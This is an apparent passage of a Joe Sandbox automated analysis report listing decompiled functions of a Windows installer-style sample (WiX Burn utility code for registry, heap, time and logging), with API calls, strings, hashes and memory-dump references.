                                                                                                                                                                                                                                                                                                  • API String ID: 260491571-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ed3d2f1509c239b0ee76b74cf5a3f2a554b10a7d773e2a775001c5f909c7920a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a5703adcbd574c669ee00caa7830ad6c1319bdcb5cf472125f82f8f4431f0c7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed3d2f1509c239b0ee76b74cf5a3f2a554b10a7d773e2a775001c5f909c7920a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE01197A500B19EFCB31AFA6D984816F7E9FF50711315C93EE1A692971C371A880DF40
                                                                                                                                                                                                                                                                                                  Function 008A7B16 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7C74
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7C7F
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7C8A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: atomutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2724874077-4059165915
                                                                                                                                                                                                                                                                                                  • Opcode ID: 690939706b51570439be7c39204d8615e3e298428cd323a9d8b30349cec8783a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 17b8a1c96b87d8e8906138c9b30c84547fe8e3da25f81e87cb3666047e0cc20a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 690939706b51570439be7c39204d8615e3e298428cd323a9d8b30349cec8783a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B51717190422AAFEB21DB64CC44FAEB7B8FF05720F154194E905EB650D771ED00DBA1
                                                                                                                                                                                                                                                                                                  Function 008A8713 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008A8820
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A882A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$ErrorFileLastSystem
                                                                                                                                                                                                                                                                                                  • String ID: clbcatq.dll$timeutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2781989572-961924111
                                                                                                                                                                                                                                                                                                  • Opcode ID: ab7342b99fc25d73e4f30731cf0be2d143c6a438e47e2a57b6b589dfd87e955f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1255c4bc443792277bb5e85f737eff3a540dce759e3f10dc84005c4608cb753a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab7342b99fc25d73e4f30731cf0be2d143c6a438e47e2a57b6b589dfd87e955f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4341C576E0021AE6EB24ABB88C45B7F7775FF52700FA54539A501E7690ED39CE0083B1
                                                                                                                                                                                                                                                                                                  Function 008A36CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(000002C0), ref: 008A36E6
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A36F6
                                                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 008A37D5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Variant$AllocClearInitString
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2213243845-1270936966
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4946948c0c3db28115e18cb12567d254b4396bca3145d9bb9e21325146180b21
                                                                                                                                                                                                                                                                                                  • Instruction ID: e0a973d8f250c71bb65fd6c8b0bb29ad56e9ab382209df8f0ac824d7de523440
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4946948c0c3db28115e18cb12567d254b4396bca3145d9bb9e21325146180b21
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A34146B5900229AFDB119FA5C888EAABBA8FF06710F1541B5FD05EB611DA35DE008B91
                                                                                                                                                                                                                                                                                                  Function 008A0E4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00888E1B), ref: 008A0EAA
                                                                                                                                                                                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00888E1B,00000000), ref: 008A0EC8
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,00888E1B,00000000,00000000,00000000), ref: 008A0F1E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Enum$InfoQuery
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 73471667-955085611
                                                                                                                                                                                                                                                                                                  • Opcode ID: bd6880cfe13fcee332793c06b55b3bc200036bd42ff0e9d773a31b29c6223ee3
                                                                                                                                                                                                                                                                                                  • Instruction ID: f0bc00e6de354ebde335782511aa7c6b350c55116870c9defb1d90bbc0c61a29
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd6880cfe13fcee332793c06b55b3bc200036bd42ff0e9d773a31b29c6223ee3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7931AF76D0152ABFFB218A84CC85EAFB66CFF05760F150065BD00FB650EB718E10AEA0
                                                                                                                                                                                                                                                                                                  Function 008A7A10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7AF4
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 008A7AFF
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7B0A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: atomutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2724874077-4059165915
                                                                                                                                                                                                                                                                                                  • Opcode ID: c0a8bf8ab75018cd35515368331d318ccf744af7058dac4024af71df6b874029
                                                                                                                                                                                                                                                                                                  • Instruction ID: 703dcfe8417ca1c29609fada4cbd6fce1909cb44688eddda324a8b75cfc08742
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0a8bf8ab75018cd35515368331d318ccf744af7058dac4024af71df6b874029
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1319232D08539BBDB129B98CC45F9EBBA8FF02750F1101A5E900FB551D770AE01AB91
                                                                                                                                                                                                                                                                                                  Function 00888B17 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,00888E57,00000000,00000000), ref: 00888BD4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to initialize package from related bundle id: %ls, xrefs: 00888BBA
                                                                                                                                                                                                                                                                                                  • Failed to open uninstall key for potential related bundle: %ls, xrefs: 00888B43
                                                                                                                                                                                                                                                                                                  • Failed to ensure there is space for related bundles., xrefs: 00888B87
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-1717420724
                                                                                                                                                                                                                                                                                                  • Opcode ID: 912f4d6cf14c0fcd93e30ab3dc21386a3b00727ac282e036636b40715ddc4548
                                                                                                                                                                                                                                                                                                  • Instruction ID: f5589bddeb015ee0c73f1a1573f635bd9c25bde10e2034d08e53b13b6749ed47
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 912f4d6cf14c0fcd93e30ab3dc21386a3b00727ac282e036636b40715ddc4548
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF21BD7284061AFBDB12AE84CC46FEEBB69FB45320F504055F900E6290DB71AA20EB91
                                                                                                                                                                                                                                                                                                  Function 00863B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,00861474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008613B8), ref: 00863B33
                                                                                                                                                                                                                                                                                                  • HeapReAlloc.KERNEL32(00000000,?,00861474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008613B8,000001C7,00000100,?,80004005,00000000), ref: 00863B3A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: HeapSize.KERNEL32(00000000,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BE2
                                                                                                                                                                                                                                                                                                  • _memcpy_s.LIBCMT ref: 00863B86
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocAllocateSize_memcpy_s
                                                                                                                                                                                                                                                                                                  • String ID: memutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3406509257-2429405624
                                                                                                                                                                                                                                                                                                  • Opcode ID: bb2bae18f8ef9d6923076354cf61e27c5a9af70ea1e3b1c3537693fe2fbbcf34
                                                                                                                                                                                                                                                                                                  • Instruction ID: c786ce93fe9f2b3741eab2e729eb6093efcfc8b599f620a3a15332c421ec934c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb2bae18f8ef9d6923076354cf61e27c5a9af70ea1e3b1c3537693fe2fbbcf34
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE11DF31A04518ABDB226E6CDC48DAE3A5AFF41770B064224F815DB2A2DA36CF1097D1
                                                                                                                                                                                                                                                                                                  Function 008A894D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A8991
                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008A89B9
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A89C3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastTime$FileSystem
                                                                                                                                                                                                                                                                                                  • String ID: inetutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1528435940-2900720265
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7476223869cf9eeb9e122783fd024db0be7d804c6279d84279e93de62667dd29
                                                                                                                                                                                                                                                                                                  • Instruction ID: 772a993b3a07d5da485e5b79d264a5a7035a9810f8418f365f4ee3679a4e891e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7476223869cf9eeb9e122783fd024db0be7d804c6279d84279e93de62667dd29
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B119A73901529A7E7209AA98C45BBFBFA8FB45750F010525AE41F7641E6349D0486F2
                                                                                                                                                                                                                                                                                                  Function 00873AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00873FB5,feclient.dll,?,00000000,?,?,?,00864B12), ref: 00873B42
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008A112B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008A1163
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1586453840-3596319545
                                                                                                                                                                                                                                                                                                  • Opcode ID: cd3a1b350db154b58b93252f2236e243b9764021bd3bc15eb1d5a5f69e3422a2
                                                                                                                                                                                                                                                                                                  • Instruction ID: fa62441b3c42a54e6de42d3ffb2b20a158f50dba8665ba054c896ccc9b6719ab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd3a1b350db154b58b93252f2236e243b9764021bd3bc15eb1d5a5f69e3422a2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6411B932B40208BBEB21DB95DC46EBAB778FB15720F408065E505E7155D771DF81E711
                                                                                                                                                                                                                                                                                                  Function 008A0764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(008812CF,00000000,00000000,?,?,?,008A0013,008812CF,008812CF,?,00000000,0000FDE9,?,008812CF,8007139F,Invalid operation for this state.), ref: 008A0776
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,008A0013,008812CF,008812CF,?,00000000,0000FDE9,?,008812CF,8007139F), ref: 008A07B2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,008A0013,008812CF,008812CF,?,00000000,0000FDE9,?,008812CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008A07BC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 606256338-3545173039
                                                                                                                                                                                                                                                                                                  • Opcode ID: c7cdbb0ec99734ad2f9575eb2b8b44ef29ddbbe8b36c9773f4e83c8508ceabf5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 672916f564413e5d1acf0243fa8d5840703362302f69c67daf8d342c2e0b29f5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7cdbb0ec99734ad2f9575eb2b8b44ef29ddbbe8b36c9773f4e83c8508ceabf5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06118A7294152DABA3109A69CD85EABBA6CFB46761B114224FD01E7740EB72ED00CDE0
                                                                                                                                                                                                                                                                                                  Function 0086120A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0086523F,00000000,?), ref: 00861248
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0086523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00861252
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
